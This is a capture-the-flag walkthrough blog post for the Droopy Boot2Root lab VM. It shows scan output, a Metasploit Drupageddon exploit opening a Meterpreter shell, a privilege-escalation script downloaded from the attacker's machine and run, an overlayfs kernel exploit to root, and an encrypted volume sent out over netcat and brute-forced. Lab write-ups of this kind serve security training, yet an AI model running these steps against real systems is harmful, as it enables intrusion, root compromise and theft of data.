Droopy Boot2Root CTF Solution

Overview

This is a step by step walk through for the Droopy CTF Boot2Root VM which can be downloaded here. Some output has been omitted for brevity, but you get the drift 😉 Enjoy! -1N3 @CrowdShield

Enumeration

As with most pentests, I rely mainly on Sn1per which can be downloaded here to quickly enumerate targets and pinpoint possible exploit vectors…

  • # sniper 192.168.1.66 web report
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.7 by 1N3

################################### Running TCP port scan ##########################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-11 08:28 MST
Nmap scan report for 192.168.1.66
Host is up (0.00027s latency).
Not shown: 35 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:A5:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.66
+ Target Hostname:    192.168.1.66
+ Target Port:        80
+ Start Time:         2016-05-11 08:28:13 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8384 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2016-05-11 08:28:36 (GMT-7) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] [!] The remote website is up, but does not seem to be running WordPress.

[-] Date & Time: 11/05/2016 08:28:42
[-] Target: http://192.168.1.66
[M] Website Not in HTTPS: http://192.168.1.66
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.1.66/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[-] Date & Time: 11/05/2016 08:30:00
[-] Completed in: 0:01:18

[-] Date & Time: 11/05/2016 08:30:01
[-] Target: http://192.168.1.66/wordpress

Exploitation

Since we now know the site is vulnerable to SA-CORE-2014-005 (ie. Drupageddon), we can quickly find the exploit using Findsploit which can be downloaded here.

   ___ _           _           _       _ _   
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|                  

+ -- --=[findsploit v1.3 by 1N3
+ -- --=[https://crowdshield.com

+ -- --=[SEARCHING:  drupal   

+ -- --=[NMAP SCRIPTS

/usr/share/nmap/scripts/http-drupal-enum.nse
/usr/share/nmap/scripts/http-drupal-enum-users.nse

+ -- --=[METASPLOIT EXPLOITS

msf_search/auxiliary:   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
msf_search/auxiliary:   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
msf_search/exploits:   multi/http/drupal_drupageddon                                  2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection

+ -- --=[Press any key to search online or Ctrl+C to exit...

Drupageddon Exploit

After, we quickly load up the exploit using Metasploit and fire away for an easy shell…

  • msf exploit(drupal_drupageddon) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
  • msf exploit(drupal_drupageddon) > exploit
[*] 192.168.1.66:80 - Testing page
[*] Started bind handler
[*] 192.168.1.66:80 - Creating new user KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Logging in as KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Trying to parse enabled modules
[*] 192.168.1.66:80 - Enabling the PHP filter module
[*] 192.168.1.66:80 - Setting permissions for PHP filter module
[*] 192.168.1.66:80 - Getting tokens from create new article page
[*] 192.168.1.66:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (32461 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.60:58733 -> 192.168.1.66:4444) at 2016-04-29 14:04:18 -0700
  • meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  89339  fil   2014-12-11 06:11:45 -0700  CHANGELOG.txt
100644/rw-r--r--  1481   fil   2014-12-11 06:11:45 -0700  COPYRIGHT.txt
100644/rw-r--r--  1717   fil   2014-12-11 06:11:45 -0700  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2014-12-11 06:11:45 -0700  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2014-12-11 06:11:45 -0700  INSTALL.sqlite.txt
100644/rw-r--r--  17995  fil   2014-12-11 06:11:45 -0700  INSTALL.txt
100664/rw-rw-r--  18092  fil   2014-12-11 06:11:45 -0700  LICENSE.txt
100644/rw-r--r--  8542   fil   2014-12-11 06:11:45 -0700  MAINTAINERS.txt
100644/rw-r--r--  5382   fil   2014-12-11 06:11:45 -0700  README.txt
100644/rw-r--r--  9642   fil   2014-12-11 06:11:45 -0700  UPGRADE.txt
100644/rw-r--r--  6604   fil   2014-12-11 06:11:45 -0700  authorize.php
100644/rw-r--r--  720    fil   2014-12-11 06:11:45 -0700  cron.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  includes
100644/rw-r--r--  11510  fil   2014-12-11 06:11:45 -0700  index.html
100644/rw-r--r--  529    fil   2014-12-11 06:11:45 -0700  index.php
100644/rw-r--r--  20     fil   2014-12-11 06:11:45 -0700  info.php
100644/rw-r--r--  703    fil   2014-12-11 06:11:45 -0700  install.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  misc
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  modules
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  profiles
100644/rw-r--r--  1550   fil   2014-12-11 06:11:45 -0700  robots.txt
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  scripts
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  sites
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  themes
100644/rw-r--r--  19986  fil   2014-12-11 06:11:45 -0700  update.php
100644/rw-r--r--  2178   fil   2014-12-11 06:11:45 -0700  web.config
100644/rw-r--r--  417    fil   2014-12-11 06:11:45 -0700  xmlrpc.php
  • meterpreter > shell
Process 1227 created.
Channel 0 created.
exit
meterpreter > 

Privilege Escalation

Now that we’ve gained initial access, the next logical step would be to see if we can escalate our privileges to root… To help speed up the process, I wrote a small shell script to quickly enumerate linux based systems for exploit vectors which can be downloaded here.

  • wget 192.168.1.60/linux-privesc.sh
--2016-04-29 22:21:14--  http://192.168.1.60/linux-privesc.sh
Connecting to 192.168.1.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14117 (14K) [text/x-sh]
Saving to: 'linux-privesc.sh'

     0K .......... ...                                        100% 12.8M=0.001s

2016-04-29 22:21:14 (12.8 MB/s) - 'linux-privesc.sh' saved [14117/14117]
  • bash linux*
-[Linux Privilege Escalation Script by 1N3]=--
-[http://treadstonesecurity.blogspot.com]=--

#>01 Whats the distribution type? What version?
#>02 What's the Kernel version? Is it 64-bit?
#>03 What can be learnt from the environmental variables?
#>04 Is there a printer?
#>05 What services are running? Which service has which user
#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!
#>07 What applications are installed? What version are they? Are they currently running?
#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
#>09 What jobs are scheduled?
#>10 Any plain text usernames and/or passwords?
#>11 What NIC(s) does the system have? Is it connected to another network?
#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
#>13 Whats cached? IP and/or MAC addresses
#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
#>15 What sensitive files can be found?
#>16 Anything interesting in the home directorie(s)? If its possible to access
#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
#>18 What has the user being doing? Is there any password in plain text? What have they been edting?
#>19 What user information can be found?
#>20 Can private-key information be found?
#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?
#>22 What can be found in /var/?
#>23 Any settings/files (hidden) on website? Any settings file with database information?
#>24 Is there anything in the log file(s) (Could help with Local File Includes!)
#>25 If commands are limited, you break out of the jail shell?
#>26 How are file-systems mounted?
#>27 Are there any unmounted file-systems?
#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
#>29 SGID (chmod 2000) - run as the  group, not the user who started it.
#>30 SUID (chmod 4000) - run as the  owner, not the user who started it.
#>31 SGID or SUID
#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm
#>33 world-writeable folders
#>34 world-writeable & executable folders
#>35 Any problem files? Word-writeable, nobody files
#>36 world-writeable files
#>37 Noowner files
#>38 What development tools/languages are installed/supported?
#>39 How can files be uploaded?

#>01 Whats the distribution type? What version?
#####################################################################
Ubuntu 14.04.1 LTS \n \l

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

#>02 What's the Kernel version? Is it 64-bit?
#####################################################################
Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13.0-43-generic x86_64
linux-privesc.sh: line 68: rpm: command not found
[    0.000000] Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 (Ubuntu 3.13.0-43.72-generic 3.13.11.11)
[    0.373742] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored
[    0.947541] Linux agpgart interface v0.103
vmlinuz-3.13.0-43-generic

Finding A Local Root Exploit

Now that we know the OS and kernel version, we can quickly search https://www.kernel-exploits.com/ for a suitable exploit. In this case, the overlayfs exploit should do the trick and can be downloaded here.

  • meterpreter > shell
Process 30295 created.
Channel 0 created.
  • pwd
/tmp
  • ./ofs_64.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
  • # whoami
root

Interesting Email

Now that we’re “root”, we should probably look for that flag. From here I quickly discovered some interesting email under /var/log/mail…

  • # cd /var
  • # ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
www
  • # cd backups
  • # cd ../mail
  • # ls
www-data
  • # cat www-data
From Dave <[email protected]> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <[email protected]>
Subject: rockyou with a nice hat!
Message-ID: <[email protected]>
X-IMAP: 0080081351 0000002016l
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
# 
</[email protected]></[email protected]>

Interesting File

After getting “root” on the box, I quickly discovered the TrueCrypt volume (/root/dave.tc) and transfered it back to my Kali box using netcat to analyze further…

# pwd
/root/
# ls
dave.tc
# nc -lvvp 4444 < dave.tc
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.1.60] port 4444 [tcp/*] accepted (family 2, sport 54838)
# ls
dave.tc
# 

Brute Forcing TrueCrypt Volumes

Since we know the TrueCrypt volume is encrypted and password protected, we’ll need a program to attempt a dictionary attack with and we’ll use the rockyou.txt wordlist as our dictionary… For this, I chose OTFBrutusGUI which can be downloaded here.

Mounting the TrueCrypt Volume

Now that we have the password for the volume, we should be able to install and mount the volume from our Kali box. NOTE: You’ll need to install truecrypt first for this to work… obviously!

Capturing the Flag

Now that our TrueCrypt volume is mounted, we can quickly navigate the directory structure and have no problems finding our flag.txt hiding in a hidden directory.

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare

 

Leave a Reply

Your email address will not be published. Required fields are marked *

four − 3 =